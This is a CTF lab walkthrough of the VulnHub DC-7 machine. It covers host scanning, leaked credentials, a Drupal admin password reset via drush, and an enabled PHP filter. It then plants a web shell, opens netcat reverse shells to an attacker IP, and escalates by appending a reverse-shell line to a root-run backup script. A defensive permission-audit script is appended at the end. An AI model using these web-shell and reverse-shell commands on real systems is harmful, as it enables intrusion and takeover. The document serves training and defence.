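1. nmap -sP 192.168.0.1/24 to discover hosts on the internal network
2. nmap -A -p 1-65535 192.168.0.104 finds ports 22/80 open on a Linux host
3. Port 80 turns out to be Drupal, the same as DC-1; the exploit fails, and the page hints at a Way "outside" the box. At the bottom of the page is @DC7USER; looking it up leads to a GitHub project, and its config file contains $username = "dc7user";$password = "MdR3xOgB7#dW"; try these for SSH login
4. ssh dc7user@192.168.0.104 logs in successfully. ls shows two files; the .gpg one is encrypted and cannot be read for now,
mbox appears to record a scheduled task; the interval is roughly 15 min and the task is /opt/scripts/backups.sh:
5. cat /opt/scripts/backups.sh: it uses drush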
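6. Use drush to change the password: cd /var/www/html
drush user-password admin --password="123"
7. Login succeeds; clicking around shows that pages can be published
The site is written in PHP, so the idea is to write PHP code, but at present only static HTML can be written and PHP code is not supported, because since Drupal 8, for security reasons, PHP has to be imported separately as a module. So import the PHP module.
manage.extend
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz : the PHP module imports successfully; enable PHP Filter and click Install below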
8. Write a one-line web shell, <?php system($_GET[cmd]);?>
http://192.168.0.104/node/1?cmd=nc%20-e%20/bin/sh%20192.168.0.100%209999
Listen on 9999 on Kali: nc -lvp 9999
9. python -c 'import pty;pty.spawn("/bin/bash")' to get an interactive shell
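Remember /opt/scripts/backups.sh from earlier?
cd /opt/scripts/
10. ls -al that config file shows it is executed with root privileges, and our current user has permission to modify it: echo "nc -e /bin/sh 192.168.0.100 1234" >> backups.sh
Listen on 1234 on Kali and wait
11. cd
View theflag.txt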
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
If you enjoyed this CTF, send me a tweet via @DCAU7.
Reference article: vulnhub渗透实战-DC7 - Wuzhiyu - 博客园 (cnblogs.com)
Takeaways
- Using drush to change the password: cd /var/www/html
- Information gathering via @DC7USER
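
The escalation in step 10 works because a script that root's scheduled task executes is writable by a non-root account. The check below is an added example, not part of the original walkthrough: the function name and the TRUSTED_UID/TRUSTED_GID variables are this example's own, and it assumes GNU stat on Linux.

```shell
#!/bin/sh
# Added example: flag a script that root's scheduler runs but that an
# account other than the trusted owner/group can modify.
# Assumption: GNU coreutils stat (Linux). Names below are illustrative.

# Trusted owner and group default to root (0); override to fit local policy.
TRUSTED_UID="${TRUSTED_UID:-0}"
TRUSTED_GID="${TRUSTED_GID:-0}"

# audit_script PATH
# Prints one line per finding. Returns 0 if clean, 1 if risky, 2 on stat failure.
audit_script() {
    local path="$1" out mode uid gid risky=0
    out=$(stat -c '%a %u %g' -- "$path" 2>/dev/null) || {
        echo "ERROR: cannot stat $path"
        return 2
    }
    # Split "mode uid gid" into positional parameters.
    set -- $out
    mode=$1 uid=$2 gid=$3

    # The owner can always rewrite or chmod the file.
    if [ "$uid" -ne "$TRUSTED_UID" ]; then
        echo "RISK: $path is owned by uid $uid"
        risky=1
    fi
    # Group write bit (octal 020) with an untrusted group.
    if [ $((0$mode & 020)) -ne 0 ] && [ "$gid" -ne "$TRUSTED_GID" ]; then
        echo "RISK: $path is writable by gid $gid"
        risky=1
    fi
    # Other write bit (octal 002): any local account can append commands.
    if [ $((0$mode & 002)) -ne 0 ]; then
        echo "RISK: $path is world-writable"
        risky=1
    fi
    return "$risky"
}

# Audit every path given on the command line,
# e.g. the script named in the cron mail: /opt/scripts/backups.sh
for f in "$@"; do
    audit_script "$f" || true
done
```

The same check should also be applied to each parent directory of the script, since write access to a directory allows the file to be replaced outright.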